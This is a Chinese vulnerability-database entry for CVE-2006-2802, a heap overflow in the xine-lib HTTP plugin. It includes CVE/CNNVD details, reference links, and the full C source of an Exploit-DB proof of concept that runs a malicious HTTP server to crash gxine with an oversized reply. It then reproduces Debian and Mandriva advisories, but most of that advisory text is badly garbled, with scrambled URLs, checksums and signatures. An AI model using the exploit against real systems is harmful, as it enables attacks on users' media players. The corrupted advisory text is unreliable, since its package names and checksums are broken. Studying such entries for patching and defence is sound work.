CVE-2006-2802
CVSS5.0
发布时间 :2006-06-03 06:02:00
修订时间 :2017-10-18 21:29:09
NMCOEPS    

[原文]Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.


[CNNVD]xine-lib xineplug_inp_http.so 堆溢出漏洞(CNNVD-200606-085)

        xine是一款免费的媒体播放器,支持多种格式。
        xine-lib的xineplug_inp_http.so插件在处理HTTP服务器的超长回复时存在堆溢出漏洞,远程攻击者可以诱骗用户打开到恶意站点的HTTP URL触发这个漏洞,导致使用该插件的应用程序崩溃。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:xine:gxine:0.5.6
cpe:/a:xine:xine-lib:1.0.1
cpe:/a:xine:xine-lib:1.0.2
cpe:/a:xine:xine-lib:1.1.0
cpe:/a:xine:xine-lib:1.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2802
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2802
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-085
(官方数据源) CNNVD

- 其它链接及资源

http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html
(UNKNOWN)  SUSE  SUSE-SR:2006:014
http://security.gentoo.org/glsa/glsa-200609-08.xml
(UNKNOWN)  GENTOO  GLSA-200609-08
http://www.debian.org/security/2006/dsa-1105
(UNKNOWN)  DEBIAN  DSA-1105
http://www.mandriva.com/security/advisories?name=MDKSA-2006:108
(UNKNOWN)  MANDRAKE  MDKSA-2006:108
http://www.securityfocus.com/bid/18187
(UNKNOWN)  BID  18187
http://www.ubuntulinux.org/support/documentation/usn/usn-295-1
(UNKNOWN)  UBUNTU  USN-295-1
https://exchange.xforce.ibmcloud.com/vulnerabilities/26972
(UNKNOWN)  XF  xinelib-xinepluginphttp-bo(26972)
https://www.exploit-db.com/exploits/1852
(UNKNOWN)  EXPLOIT-DB  1852

- 漏洞信息

xine-lib xineplug_inp_http.so 堆溢出漏洞
中危 缓冲区溢出
2006-06-03 00:00:00 2006-06-05 00:00:00
远程  
        xine是一款免费的媒体播放器,支持多种格式。
        xine-lib的xineplug_inp_http.so插件在处理HTTP服务器的超长回复时存在堆溢出漏洞,远程攻击者可以诱骗用户打开到恶意站点的HTTP URL触发这个漏洞,导致使用该插件的应用程序崩溃。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://xinehq.de/

- 漏洞信息 (1852)

gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC (EDBID:1852)
linux dos
2006-05-30 Verified
0 Federico L. Bossi Bonin
N/A [点击下载]
//////////////////////////////////////////////////////
// gxine - HTTP Plugin Remote Buffer Overflow PoC
/////////////////////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
/////////////////////////////////////////////////////

// TESTED on gxine 0.5.6
////////////////////////

// 0xb78eccc7 in free () from /lib/tls/libc.so.6
// (gdb) backtrace
// #0  0xb78eccc7 in free () from /lib/tls/libc.so.6
// #1  0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so
// #2  0x41414141 in ?? ()
// #3  0xb7f42164 in ?? () from /usr/lib/libxine.so.1
// #4  0x080b1810 in ?? ()
// #5  0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1
// #6  0xb7f3967f in ?? () from /usr/lib/libxine.so.1
// #7  0x0877c084 in ?? ()
// #8  0x0930a931 in ?? ()
// #9  0x080880a2 in defs.3 ()
// #10 0xb0088478 in ?? ()
// #11 0x00000000 in ?? ()

#include <stdio.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 81
#define LEN 9500

void shoot(int);

int main() {
struct sockaddr_in srv_addr, client;
int len,pid,sockfd,sock;

sockfd = socket(AF_INET, SOCK_STREAM, 0);

if (sockfd < 0) { 
perror("error socket()"); 
exit(1);
}
     
bzero((char *) &srv_addr, sizeof(srv_addr));
srv_addr.sin_family = AF_INET;
srv_addr.sin_addr.s_addr = INADDR_ANY;
srv_addr.sin_port = htons(PORT);

if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0)  {
perror("error bind()");
exit(1);
}



printf("Listening on port %i\n",PORT);

listen(sockfd,5);
len = sizeof(client);

while (1) {
sock = accept(sockfd, (struct sockaddr *) &client, &len);
if (sock < 0)  {
perror("error accept()");
exit(1);
}

pid = fork();
if (pid < 0)  {
perror("fork()");
exit(1);
}
if (pid == 0)  {
close(sockfd);
printf("Conection from %s\n",inet_ntoa(client.sin_addr));
shoot(sock);
exit(0);
}
else close(sock);
} 
return 0;
}

void shoot (int sock) {
int i;
for (i=0 ; i < LEN ; i++) {
write(sock,"\x41",1);
}

}

// milw0rm.com [2006-05-30]
		

- 漏洞信息 (F48093)

Debian Linux Security Advisory 1105-1 (PacketStormID:F48093)
2006-07-09 00:00:00
Debian  debian.org
advisory,remote,web,denial of service,overflow
linux,debian
CVE-2006-2802
[点击下载]

Debian Security Advisory 1105-1 - Federico L. Bossi Bonin discovered a buffer overflow in the HTTP Plugin in xine-lib, the xine video/media player library, that could allow a remote attacker to cause a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1105-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
July 7th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : xine-lib
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2802
BugTraq ID     : 18187
Debian Bug     : 369876

Federico L. Bossi Bonin discovered a buffer overflow in the HTTP
Plugin in xine-lib, the xine video/media player library, taht could
allow a remote attacker to cause a denial of service.

For the old stable distribution (woody) this problem has been fixed in
version 0.9.8-2woody5.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.1-1sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.1.1-2.

We recommend that you upgrade your libxine packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody5.dsc
      Size/MD5 checksum:      761 113ef134a39e2f37bc6395dc2e43b538
    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8-2woody5.diff.gz
      Size/MD5 checksum:     2339 194c32b8c93f5e85c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_0.9.8.orig.tar.gz
      Size/MD5 checksum:  1766178 d8fc9b30e15b50af8ab7552bbda7aeda

  Alpha architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_alpha.deb
      Size/MD5 checksum:   261022 3314df47933eadc0af5b5cf4a36afdfe
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_alpha.deb
      Size/MD5 checksum:   816024 897664eee06d09f43375f5320be1f17b

  ARM architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_arm.deb
      Size/MD5 checksum:   302960 9dee75c3d13aabb5e83978e0d75ec4ce
    http://security.debian.org/pool/updates/main/x/xine-lib/libxine0_0.9.8-2woody5_arm.deb
      Size/MD5 checksum:   671494 dafc6c14181802dd56c887583bbf5140

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_0.9.8-2woody5_i3biathe.deb   hita   hit/pol oineomainrg/-ib/li:

seh.0785c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinev_0.9.8-2woody5_i3biathe.deb   hita807996 1dd6e4530293c420a14594 deeee99bdd56c887583bbf6440

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dea64.9.8-2woody5_i3biathe.deb   hita   864446ae5bb7b3256421dd7291e

s898Deb5c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinea64.9.8-2woody5_i3biathe.deb   hita95365che87b267a44c50h.0f8bf   190852ca8-32 Herf wiibeen 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dhpp.9.8-2woody5_alpha.deb
      Size/M0968 aa1ksu4597c5c6b9a8271c64f0a587a05c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinhpp.9.8-2woody5_alpha.deb
      Size846792 60ed39365a0c67db2d4fba67d2ba1c14-32 Motorola 680x0 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dm68k9.8-2woody5_alpha.deb
      Size/92718 2a87b508bccMD5a01abf   c3773d40d5c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinm68k9.8-2woody5_alpha.deb
      SizeD5 7ulz670976ef40.071473fa948e59489bcks-32 Bigt asfiguMIPS 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dmips9.8-2woody5_alpha.deb
      Size/99()
/5b0c4um:u45472fi:
259409b36c3d185c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinmips9.8-2woody5_alpha.deb
      Size653 86 0044bef2d6ebeb01385d1a20a7MD546a-32 Littlet asfiguMIPS 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dmipsel9.8-2woody5_alpha.deb
      Size/99568 79851709d297d9ine4b6oma5 tha6b3a5c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinmipsel9.8-2woody5_alpha.deb
      Size655030  868f2d006c6b5282
s880a8460fed77-32 PowerPC 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dpowerpc9.8-2woody5_alpha.deb
      Size/MD2)
/fc16e5e2s893ead2c94c917145754 df5c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinpowerpc9.8-2woody5_alpha.deb
      Size742454 6c2be22409f910c45c0bbecka4f 7u9f4337IBM S/390 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-ds3900.9.8-2woody5_arm.deb
      Size/MD404hec5ined12b431358f99-ib88e/999cb55c873454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxins3900.9.8-2woody5_arm.deb
      Size66/920 5da8cbae8d02f579e8150dde1b07c4f8-32 Sun Sp0

 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dsp0

9.8-2woody5_alpha.deb
      Size/MD104h30717fe03ecks5dfba5 dbf4eckd938-2wood454412f63552
    http://security.debian.org/pool/updates/main/x/xine-lib/libxinsp0

9.8-2woody5_alpha.deb
      Size803/MD fe08139ea1b35f3e7d5b7bcbseh20dd3er configuration.


De1ian GNUn
verx 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/x/xfixed in
versiib_0.9.8-2woody5.dsc
      Size/M1062 998afa8ddece7f06aac69cb8787b8bea5c873454412f63552
    http://security.debian.org/pool/updates/main/x/xfixed in
versiib_0.9.8-2woody5.diff.gz
      Size/M3230 6b65bdac09c698d6dcf  c01f409714-2wood454412f63552
    http://security.debian.org/pool/updates/main/x/xfixedib/xine-lib_0.9.8.orig.tar.gz
      Siz7774954 9be804b 89sum3a2h202c5a7289sb0f8-32 7552bbda7aeda

  Alpha architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versne0_0.9.8-2woody5_alpha.deb
      Size107646 53ba83cd587bed30cdba5dd96a240e43ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versne0_0.9.8-2woody5_alpha.deb
      Siz4829370 83e8d3ed71f20b06d4edcd1a97247904-32 AMD6440

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnemd64.9.8-2woody5_i3biathe.deb   hita107640 9be42e567a232db85 de634afc6ccea1ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versnemd64.9.8-2woody5_i3biathe.deb   hit3933392 0302af4b88fd5cc99ab7048e386a81ef43375f5320be1f17b

  ARM architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versne0_0.9.8-2woody5_arm.deb
      Size107698 857f520bcc947238b6a1732239508e/9ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versne0_0.9.8-2woody5_arm.deb
      Siz3878442 e50597fd20cff3d6965e0e55640s5dadd56c887583bbf5140

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnev_0.9.8-2woody5_i3biathe.deb   hita107702 56fb77a0b6f0d01b3eb7cffMD5b7fc2b5e83978e0d75ec4ce
    http://security.debian.org/pool/updates/main/x1efixed in
versnev_0.9.8-2woody5_i3biathe.deb   hit4204886 3fb1c5b93a8bd2857f8da12f95a0c144d56c887583bbf6440

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnea64.9.8-2woody5_i3biathe.deb   hita107648 e5540cc5bbe66e9565fc412ned37a23d5c873454412f63552
    http://security.debian.org/pool/updates/main/x1efixed in
versnea64.9.8-2woody5_i3biathe.deb   hit5620728 800474cd0356d391f8ac843104de8057-32 Herf wiibeen 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnhpp.9.8-2woody5_alpha.deb
      Size107676 8f22e95235u456-ibf92217a6305a54-2wood454412f63552
    http://security.debian.org/pool/updates/main/x1efixed in
versnhpp.9.8-2woody5_alpha.deb
      Siz3600400 0ffs88a7efd1cc0.072cc3bdd1c88a70-32 Motorola 680x0 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnm68k9.8-2woody5_alpha.deb
      Size107720 97d1027b157b256MD1e234ch20c76 892wood454412f63552
    http://security.debian.org/pool/updates/main/x1efixed in
versnm68k9.8-2woody5_alpha.deb
      Siz3175260 ee6cef5.8-75f0396b13013602f30b90-32 Bigt asfiguMIPS 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnmips9.8-2woody5_alpha.deb
      Size107654 639d0ee2c65047864b5c726dfba30fcf5c873454412f63552
    http://security.debian.org/pool/updates/main/x1efixed in
versnmips9.8-2woody5_alpha.deb
      Siz4066606 b7beb0cb4615f6ca98b4fbff3be16c06-32 Littlet asfiguMIPS 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnmipsel9.8-2woody5_alpha.deb
      Size107678 ba9bb94702fcf451db6dde218e/3bc21ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versnmipsel9.8-2woody5_alpha.deb
      Siz4125476 fc4b6/MD829beff3ba2fba175e7eck84-32 PowerPC 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnpowerpc9.8-2woody5_alpha.deb
      Size107686 0ch2a02a85fd72b5bb24213fc025f864ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versnpowerpc9.8-2woody5_alpha.deb
      Siz4305544 68c2be929520c8a45439d36ef8d0a2ca4337IBM S/390 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versns3900.9.8-2woody5_arm.deb
      Size107652 63c9659dc1e004412faf09d9feafee037bc6395dc2e43b538
    http://security.debian.org/pool/updates/main/x1efixed in
versns3900.9.8-2woody5_arm.deb
      Siz3880838 b747276-ib6ef573414:  10adc32fee-32 Sun Sp0

 0

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/x/xinefixed in
versnsp0

9.8-2woody5_alpha.deb
      Size107666 045189d3cd49c72f4e4bf26ea391fec1ha architecture:

    http://security.debian.org/pool/updates/main/x1efixed in
versnsp0

9.8-2woody5_alpha.deb
      Siz4360438 15333a715e57287c63f2f2f36b40sc80-32woThes    wist upgrutioably be movblem  from trge3.

For the unstaon2woits nexadvisory.E-----
Hash: SHA1

- ----------------------------------------------------------------- 1.0nternal: .8-rchitecture:

    http://sectrge3.
y.debian shoo- 1.0the -fite fitecture:

    http://secdtype   --------For ref=e3.
y.debian.org/
Mailted line: .8-pe   -------ive/suse-@="_bla        sec--------2>
: `ntercacm trhowt i;
he  <'n Vul        
--ATURPGP SIGVs been: GnuPG v1.4x080ration.

)

iD8DBQFErgKeW5ql+IAeqTIRAlpvAJ4yapJ+ISmJTUjpPiihYLpFjCXT3gCgsYoT
CWOU1x/y/dGOIGdgvJh3dvI=
=NtJpoolbarENDse;'>
--ATURPGP SIG2woodm [2006-05-30]
		

- 7u45洞信息 (F48093)

<7u45"d="info_psF48093">
Debian Linux SID .108> y 1105-1 7u45etStormID:F48093)
Debian  http://www.mandriva.com/se.com/files/48093/"lank">http:/blank">debian.org
advisory,remote,web,denial of service,overflow
CVE-2006-2802
[点击下载]
Debian Linux Sp;MANDRAKE-108 - Aonin discovered a buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated usingl of service.

-----BEGIN PGP SIGNED MESSAGE- _______________________________________________________________________
 
 Mank">ht:Debian Linux SSSSSSSSSSSSSSSSSSSSSSSSSp;MANDRAKE &nb
 n  http://www.mandr- _______________________________________________________________________
 
 --------

Package   D an  187
Justr20 Schul
 An dill 
}
.2 Schul.0 SCorpoerve
Deb- _______________________________________________________________________
 
 -tion (sDeBrushPeen:
 
 Aonin discovered a buffer overflow in the HTTP Plugin (xineplug_inp_http.
.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of serv
vice (application crash) via a long reply from an HTTP server, as demonstr
rated u (/label>
    )
 
 Intomat serom  p76

wrap=in discovered aex"_bla bufferAVIn HTuxfro
 similara bunael I rem/label>
1502plug_MPine v.oTheSCorpoerve
D" taehe ito cinp_http.doan not haveven atissuy.E 
 TheS.debia install c havevthis patcm d remo   wiluffe atissuys.- _______________________________________________________________________

 Rill insts:
 
  target="_blank">http://cve.mitre.org/cgi-bin/cvename.cgi?n- _______________________________________________________________________
 
 Udebia i-------s:
 
 Mank">ht:ht:ht:ht:htUdebia or urpmi.woThe v状of serito cmddeb
      sn VulGPG signael Iatis performsi B
You micall pl fetch.

 Apgrustall c ed fsignsi by Mank">htl fettp://pac  rectcan obta buffe
lGPG public key givenkaMank">htabel>DebiaTeam by exel>tingA-32 gpg --recv-keys --keysly fr pgpblan.edu 0x22458A98-32rectcan web. oenkr use an iva.com/seplug_Mank">ht:http://www.mandriva.com/se-32eferencwant remreuot;Lrce.ibmcloud.co, paehe ter tact-32 www.mand_(at)_lank">http:/
 _______________________________________________________________________

 TverfBloitKey006-280D an  18888Usly ID
 pub a
24D/22458A98achu0el>
10aMank">htabel>DebiaTeam32 .h>el>Debi*lank">http:/ <
olbar: false;'>
--ATURPGP SIGVs been: GnuPG v1.4x2.280ration.

)

iD8DBQFEmHBfmqjQ0CJFipgRAlbUAKDUUil0PlZfHc0NjOkdEi0QXQf11ACcC+FW
E+NQPFSVEummnHm6+6kmdxU=
=ft5moolbarENDse;'>
--ATURPGP SIG2woodm [2006-05-30]
		

93)